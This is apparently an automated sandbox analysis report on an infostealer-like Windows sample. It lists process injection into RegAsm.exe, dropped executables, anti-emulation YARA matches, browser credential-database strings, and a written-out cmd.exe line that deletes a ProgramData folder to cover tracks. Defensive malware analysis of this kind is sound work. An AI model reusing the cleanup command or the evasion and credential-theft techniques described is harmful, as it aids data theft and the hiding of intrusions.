Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00411B6E 9_2_00411B6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00424B70 9_2_00424B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401330 9_2_00401330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00427B30 9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004323DD 9_2_004323DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004063E0 9_2_004063E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407B80 9_2_00407B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040DB90 9_2_0040DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043E390 9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00425B9D 9_2_00425B9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004223B5 9_2_004223B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043DC70 9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00404C20 9_2_00404C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042F4C7 9_2_0042F4C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040D4D0 9_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00435CD0 9_2_00435CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041A4EA 9_2_0041A4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00433D5E 9_2_00433D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040F578 9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040A500 9_2_0040A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042C521 9_2_0042C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00420D30 9_2_00420D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00431530 9_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00428535 9_2_00428535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043D5DE 9_2_0043D5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CDED 9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00421DB5 9_2_00421DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042AE2B 9_2_0042AE2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041E6C0 9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043F6F0 9_2_0043F6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004306F7 9_2_004306F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00406E80 9_2_00406E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00436E82 9_2_00436E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00430EAE 9_2_00430EAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00401FC5 9_2_00401FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00404FD0 9_2_00404FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00418FD5 9_2_00418FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00402FE0 9_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004357E0 9_2_004357E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0042EF89 9_2_0042EF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043DF90 9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004237A0 9_2_004237A0
Source: C:\ProgramData\KJKJJJECFI.exe Code function: 10_2_00840B44 10_2_00840B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAC61E0 12_2_1DAC61E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAD3920 12_2_1DAD3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DACD100 12_2_1DACD100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DACFD50 12_2_1DACFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAA9CC0 12_2_1DAA9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAAF8D0 12_2_1DAAF8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAA9430 12_2_1DAA9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAAA2C0 12_2_1DAAA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DAD16D0 12_2_1DAD16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB39F80 12_2_1DB39F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB1AEBE 12_2_1DB1AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB39A20 12_2_1DB39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1DB39390 12_2_1DB39390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1D954CF0 12_2_1D954CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1D977810 12_2_1D977810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1D959000 12_2_1D959000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1D94EA80 12_2_1D94EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_1D9566C0 12_2_1D9566C0
Source: Joe Sandbox View Dropped File: C:\ProgramData\KJKJJJECFI.exe 5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
Source: Joe Sandbox View Dropped File: C:\ProgramData\KKJEBAAECB.exe 353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C2FDAE0 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C1094D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C2F09D0 appears 172 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C199B10 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C0FCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C193620 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C2FD930 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000000.1637407171.0000000000900000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KKJEBAAECB.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KJKJJJECFI.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/39@4/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C127030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 2_2_6C127030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 2_2_0040FD2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040F4A5 _EH_prolog,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 2_2_0040F4A5
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\ProgramData\KJKJJJECFI.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGIJJK.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"
Source: C:\ProgramData\KKJEBAAECB.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KKJEBAAECB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KKJEBAAECB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"
Source: C:\ProgramData\KJKJJJECFI.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KJKJJJECFI.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
